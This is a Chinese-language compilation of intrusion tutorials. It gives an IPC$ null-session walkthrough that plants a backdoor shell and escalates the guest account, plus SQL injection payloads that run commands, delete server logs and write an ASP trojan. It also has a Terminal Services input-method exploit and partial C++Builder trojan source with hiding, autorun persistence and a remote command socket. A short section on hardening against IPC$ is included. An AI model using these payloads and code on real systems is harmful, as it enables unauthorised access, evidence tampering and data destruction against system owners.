错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.
五、 如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。
六、 如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(每次输入一个)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)
七、 相关命令
1)建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
3)映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
4)删除一个ipc$连接
net use \\IP\ipc$ /del
5)删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
八、 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\>copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\>net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\>net user guest /active:yes
将对方的Guest用户激活
11. C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
整理的一些有用的ASP注入相关的命令
用^转义字符来写ASP文件的方法。
2、 http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
显示SQL系统版本:
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760
(Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation
Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp,行17
3、 我在检测索尼中国的网站漏洞时,分明已经确定了漏洞存在却无法
在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用“in”关键字进行查询,
例如“select * from mytable where id in(1)”,括号中的值就是我们提交的数据,它的结果与使用“select *
from mytable where id=1”的查询结果完全相同。所以访问页面的时候在URL后面加上“) and 1=1 and 1 in(1”
后原来的SQL语句就变成了“select * from mytable where id in(1) and 1=1 and 1 in(1)”,这样就会出现期待已久的页面了。
暂且就叫这种类型的漏洞为“包含数字型”吧,聪明的你一定想到了还有“包含字符型”呢。对了,它就是由于类似
“select * from mytable where name in(‘firstsee’)”的查询语句造成的。
4、 http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*)
FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
判断xp_cmdshell扩展存储过程是否存在。
5、 http://192.168.1.5/display.asp?k ... er.dbo.xp_regwrite%
20'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1',
'REG_SZ','cmd.exe%20/c%20net user test ptlove /add'
向启动组中写入命令行和执行程序
6、 http://192.168.1.5/display.asp?keyno=188%20and%200<>db_name()
查看当前的数据库名称Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp,行17
7、 列出当前所有的数据库名称:select * from master.dbo.sysdatabases
8、 不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令:
CREATE TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--因为fso的opentextfile方法将返回一个textstream对象,所以此时@file是一个对象令牌
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
DROP TABLE MYTMP
----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
以下是一行里面将WEB用户加到管理员组中:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
以下是一行中执行EXE程序:
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
SQL下两种执行CMD命令的方法:
先删除7.18号日志:
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
再考贝一个其它文件来代替7.18日文件:
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
9、 用UPDATE来更新表中的数据:
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd=' a0b923820dcc509a' where username='www';--
www用户密码的MD5值为:AAABBBCCCDDDEEEF,即把密码改成1;
10、 利用表内容导成文件功能
SQL有BCP命令,它可以把表的内容导成文本文件并放到指定位置。利用这项功能,我们可以先建一张临时表,
然后在表中一行一行地输入一个ASP木马,然后用BCP命令导出形成ASP文件。
命令行格式如下:
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost
–U sa –P upload('S'参数为执行查询的服务器,'U'参数为用户名,'P'参数为密码,
最终上传了一个runcommand.asp的木马)。
10、创建表、播入数据和读取数据的方法
创建表:
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
往表里播入数据:
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255)
select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,
@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255)
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE',
'SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots',
'/' ,@result output insert into cyfd (gyfd) values(@result);--
从表里读取数据:
' and 1=(select count(*) from cyfd where gyfd >1)--
删除临时表:
';drop table cyfd;--
12、通过SQL语句直接更改sa的密码:
update master.dbo.sysxlogins
set password=0x0100AB01431E944AA50
CBB30267F53B9451B7189CA67AF19A1FC944AA5
0CBB30267F53B9451B7189CA67AF19A1FC
where sid=0x01,这样sa的密码就被我们改成了111111拉。
呵呵,解决的方法就是把sa给删拉。,怎么删可以参考我的《完全删除sa这个后门》。
查看本机所有的数据库用户名:
select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins
更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'
13、查询dvbbs库中所有的表名和表结构
select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
select * from dvbbs.dbo.syscolumns where id=1426104121
14、手工备份当前数据库
完全备份:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database
@a to disk=@s WITH formAT--
差异备份:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database
@a to disk=@s WITH DIFFERENTIAL,formAT—
15、添加和删除一个SA权限的用户test
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
cmd.exe /c isql -E /U alma /P /i K:\test.qry
16、select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
就可以列出库ChouYFD中所有的用户建立的表名。
Select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0
17、
http://www.test.cn/zgrdw/common/
image_view.jsp?sqlstr=select%20*%20from
%20rdweb.dbo.syscolumns (where id=1234)
列出rdweb库中所有表中的字段名称
select * from dvbbs.dbo.syscolumns where id=5575058
列出库dvbbs中表id=5575058的所有字段名
18、删除记录命令:delete from Dv_topic where boardid=5 and topicid=7978
19、绕过登录验证进入后台的方法整理:
1)' or''='
2) ' or 1=1--
3) ‘ or ‘a’=’a--
4) ‘or’=’or’
5) " or 1=1--
6)or 1=1--
7) or ’a=’a
8)" or "a"="a
9) ’) or (’a’=’a
10) ") or ("a"="a
11) ) or (1=1
20、查看WEB网站安装目录命令:
cscript c:\inetpub\
adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt
type c:\test1.txt
del c:\test1.txt
在NBSI下可以直接显示运行结果,所以不用导出到文件
网络视窗 1.06
个人FTP服务器 1.35
簡單的 Winsock 應用程式設計[包含HOOK函数应用]
如何利用终端入侵远程计算机
3389的利用
用过windows 2000终端服务的人一定可以体会到终端服务的方便。但是这也给我们造成了安全风险。
恶意用户可以通过猜密码进入系统,更危险的是,如果这台机器存在输入法漏洞的话,那么入侵者
可以完全控制这台机器。
下面我来讲讲如何利用输入法漏洞远程入侵开了终端服务的windows 2000的机器:
首先我们确定某台机器的3389端口是开放的:
D:\\Nmapnt>nmapNT.exe -sS -p 3389 xxx.xxx.xxx.xxx
Starting nmapNT V. 2.53 by ryan@eEye.com
eEye Digital Security ( http://www.eEye.com )
based on nmap by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on FGF-DELL4300 (xxx.xxx.xxx.xxx):
Port State Service
3389/tcp open msrdp
Nmap run completed -- 255 IP addresses (93 hosts up) scanned in 542 seconds
D:\TOOLS\nmapNT\Nmapnt>
现在我们已经可以看到这台机器的终端服务是开放的,那么我们就可以开始行动了。
打开终端服务客户端,添上IP地址,选择连接。
稍等片刻,一般是很快的,就会出现熟悉的登陆对话框了,这是我们看看有没有输入法的漏洞。有关
输入法的漏洞请参看相关文章。如果有输入法漏洞那么我们如何取得控制权呢?经过多次的研究试验。
终于想出了一个办法。我们发现在跳至url后,我们双击winnt目录下的explorer.exe并没什么反应(是
机上已经运行了,可是我们为什么看不到结果呢?),如果我们不断的进行双击,或者什么也不做,一
会儿连接将被断开,在断开的一霎那,我们似乎看到了我们双击出来的窗口。经过几次试验,我们发现
不登陆进去是不行的,将会被服务端断开。于是想办法先登陆进去,我想到了在帮助中打开用户管理器,
经过试验,在跳至url中添入:mk:@MSITStore:C:\WINNT\Help\TSHOOTconcepts.chm::/where_usermgr.htm
在右侧会出现一个可以打开本地用户和组的管理器的链接,本来在正常情况下是可以打开这个管理器的,
可是在没有登陆进去的时候就是出不来,于是想另外的办法。终于想到了建立一个命令行的快捷方式。在跳
至url中输入:c:\winnt\system32,然后找到net.exe,右键点击net.exe,选择创建快捷方式,于是创建了
一个文件名为快捷方式net.lnk的文件,然后再右键点击这个快捷方式,选择属性,这时我们就可以输入我们
的命令了。在目标中添入我们要执行的命令的路径和参数就行了,我们还是用net命令,因此不必改路径了,
添加个账号test的命令如下,C:\WINNT\system32\net.exe user test/add。密码为空。然后双击这个快捷方
式运行它。然后我们把这个账号添加到administrators组中,
C:\WINNT\system32\net.exe localgroup administrators test/add。OK!再运行。我们现在已经基本上成功了,
关掉帮助窗口,用test账号登陆,密码为空。进去后我们把刚才建的快捷方式删掉。然后再将本地用户的
TSinternetuser账号加进administrators组中,设置密码。这样我们下次就可以用这个账号进来了。然后
再用这个账号登陆一下,如果能够登陆,就删掉刚刚建立的test账号。
这台机器就这样控制在我们的手里了。。。。。。
木马是如何编写的
对编辑木马感兴趣的近来看看吧``
首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如"死牛崇拜"黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗?
启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。
Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。
我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的"关闭程序"对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。
首先判断目标机的操作系统是Win9x还是WinNt:
{
DWORD dwVersion = GetVersion();
// 得到操作系统的版本号
if (dwVersion >= 0x80000000)
// 操作系统是Win9x,不是WinNt
{
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
//定义RegisterServiceProcess()函数的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
//加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
//得到RegisterServiceProcess()函数的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
//执行RegisterServiceProcess()函数,隐藏本进程
FreeLibrary(hDLL);
//卸载动态链接库
}
}
这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。
接着再将自己拷贝一份到%System%目录下,例如:C:\\Windows\\System,并修改注册表,以便启动时自动加载:
{
char TempPath[MAX_PATH];
//定义一个变量
GetSystemDirectory(TempPath ,MAX_PATH);
//TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径
SystemPath=AnsiString(TempPath);
//格式化TempPath字符串,使之成为能供编译器使用的样式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\\\Tapi32.exe").c_str() ,FALSE);
//将自己拷贝到%System%目录下,并改名为Tapi32.exe,伪装起来
Registry=new TRegistry;
//定义一个TRegistry对象,准备修改注册表,这一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
//设置主键为HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\\\Microsoft\\\\Windows\\\\
CurrentVersion\\\\Run",TRUE);
//打开键值Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run,如果不存在,就创建之
try
{
//如果以下语句发生异常,跳至catch,以避免程序崩溃
if(Registry->ReadString("crossbow")!=SystemPath+"\\\\Tapi32.exe")
Registry->WriteString("crossbow",SystemPath+"\\\\Tapi32.exe");
//查找是否有"crossbow"字样的键值,并且是否为拷贝的目录%System%+Tapi32.exe
//如果不是,就写入以上键值和内容
}
catch(...)
{
//如果有错误,什么也不做
}
}
好,FormCreate过程完成了,这样每次启动都可以自动加载Tapi32.exe,并且在"关闭程序"对话框中看不见本进程了,木马的雏形初现。
接着选中ServerSocket控件,在左边的Object Inspector中将Active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将Port填入4444,这是木马的端口号,当然你也可以用别的。但是你要注意不要用1024以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用1024以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,Windows也不会报错 ^_^)。你可以看一看TNMFTP控件使用的端口,是21号端口,这是FTP协议的专用控制端口(FTP Control Port);同理TNMSMTP的25号端口也是SMTP协议的专用端口。
再选中ServerSocket控件,点击Events页,双击OnClientRead事件,敲入以下代码:
{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
//定义了一堆待会儿要用到的变量
sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\\\Win369.BAT")).c_str());
//在%System%下建立一个文本文件Win369.bat,作为临时文件使用
AnsiString temp=Socket->ReceiveText();
//接收客户端(攻击者,也就是你自己)传来的数据
}
好,大门敞开了!接着就是修改目标机的各种配置了!^_^ 首先我们来修改Autoexec.bat和Config.sys吧:
{
if(temp.SubString(0,9)=="edit conf")
//如果接受到的字符串的前9个字符是"edit conf"
{
int number=temp.Length();
//得到字符串的长度
int file_name=atoi((temp.SubString(11,1)).c_str());
//将第11个字符转换成integer型,存入file_name变量
//为什么要取第11个字符,因为第10个字符是空格字符
content=(temp.SubString(12,number-11)+\'\\n\').c_str();
//余下的字符串将被作为写入的内容写入目标文件
FILE *fp=NULL;
char filename[20];
chmod("c:\\\\autoexec.bat",S_IREAD|S_IWRITE);
chmod("c:\\\\config.sys",S_IREAD|S_IWRITE);
//将两个目标文件的属性改为可读可写
if(file_name==1)
sprintf(filename,"%s","c:\\\\autoexec.bat");
//如果第11个字符是1,就把Autoexec.bat格式化
else if(file_name==2)
sprintf(filename,"%s","c:\\\\config.sys");
//如果第11个字符是1,就把Config.sys格式化
times_of_try=0;
//定义计数器
while(fp==NULL)
{
//如果指针是空
fp=fopen(filename,"a+");
//如果文件不存在,创建之;如果存在,准备在其后添加
//如果出错,文件指针为空,这样就会重复
times_of_try=times_of_try+1;
//计数器加1
if(times_of_try>100)
{
//如果已经试了100次了,仍未成功
Socket->SendText("Fail By Open File");
//就发回"Fail By Open File"的错误信息
goto END;
//跳至END处
}
}
fwrite(content,sizeof(char),strlen(content),fp);
//写入添加的语句,例如deltree/y C:或者format/q/autotest C:,够毒吧?!
fclose(fp);
//写完后关闭目标文件
Socket->SendText("Sucess");
//然后发回"Success"的成功信息
}
}
你现在可以通过网络来察看目标机上的这两个文件了,并且还可以向里面随意添加任何命令。
这回我们就来查看目标机上的目录树和文件吧,这在客户端上使用"dir"命令,跟着敲啰:
{
else if(temp.SubString(0,3)=="dir")
{
//如果前3个字符是"dir"
int Read_Num;
char * CR_LF="\\n";
int attrib;
char *filename;
DIR *dir;
struct dirent *ent;
int number=temp.Length();
//得到字符串的长度
AnsiString Dir_Name=temp.SubString(5,number-3);
//从字符串第六个字符开始,将后面的字符存入Dir_Name变量,这是目录名
if(Dir_Name=="")
{
//如果目录名为空
Socket->SendText("Fail By Open DIR\'s Name");
//返回"Fail By Open DIR\'s Name"信息
goto END;
//跳到END
}
char * dirname;
dirname=Dir_Name.c_str();
if ((dir = opendir(dirname)) == NULL)
{
//如果打开目录出错
Socket->SendText("Fail by your DIR\'s name!");
//返回"Fail By Your DIR\'s Name"信息
goto END;
//跳到END
}
times_of_try=0;
while(fp==NULL)
{
//如果指针是NULL
fp=fopen(TempFile,"w+");
//就创建system\\Win369.bat准备读和写;如果此文件已存在,则会被覆盖
times_of_try=times_of_try+1;
//计数器加1
if(times_of_try>100)
{
//如果已经试了100次了,仍未成功(真有耐心!)
Socket->SendText("Fail By Open File");
//就发回"Fail By Open File"的错误信息
goto END;
//并跳到END处
}
}
while ((ent = readdir(dir)) != NULL)
{
//如果访问目标目录成功
if(*(AnsiString(dirname)).AnsiLastChar()!=\'\\\\\')
//如果最后一个字符不是"\\",证明不是根目录
filename=(AnsiString(dirname)+"\\\\"+ent->d_name).c_str();
//加上"\\"字符后将指针指向目录流
else
filename=(AnsiString(dirname)+ent->d_name).c_str();
//如果是根目录,则不用加"\\"
attrib=_rtl_chmod(filename, 0);
//得到目标文件的访问属性
if (attrib & FA_RDONLY)
//"&"字符是比较前后两个变量,如果相同返回1,否则返回0
fwrite(" R",sizeof(char),3,fp);
//将目标文件属性设为只读
else
fwrite(" ",sizeof(char),3,fp);
//失败则写入空格
if (attrib & FA_HIDDEN)
fwrite("H",sizeof(char),1,fp);
//将目标文件属性设为隐藏
else
fwrite(" ",sizeof(char),1,fp);
//失败则写入空格
if (attrib & FA_SYSTEM)
fwrite("S",sizeof(char),1,fp);
//将目标文件属性设为系统
else
fwrite(" ",sizeof(char),1,fp);
//失败则写入空格
if (attrib & FA_ARCH)
fwrite("A",sizeof(char),1,fp);
//将目标文件属性设为普通
else
fwrite(" ",sizeof(char),1,fp);
//失败则写入空格
if (attrib & FA_DIREC)
fwrite("
",sizeof(char),9,fp);
//将目标文件属性设为目录
else
fwrite(" ",sizeof(char),9,fp);
//失败则写入空格
fwrite(ent->d_name,sizeof(char),strlen(ent->d_name),fp);
//将目录名写入目标文件
fwrite(CR_LF,1,1,fp);
//写入换行
}
fclose(fp);
//关闭文件
closedir(dir);
//关闭目录
FILE *fp1=NULL;
times_of_try=0;
while(fp1==NULL)
{
fp1=fopen(TempFile,"r");
//打开Win369.bat准备读
times_of_try=times_of_try+1;
//计数器加1
if(times_of_try>100)
{
//如果已经试了100次了,仍未成功
Socket->SendText("Fail By Open File");
//就发回"Fail By Open File"的错误信息
goto END;
//并跳到END处
}
}
AnsiString Return_Text="";
char temp_content[300];
for(int i=0;i<300;i++) temp_content=\'\\0\';
//定义的一个空数组
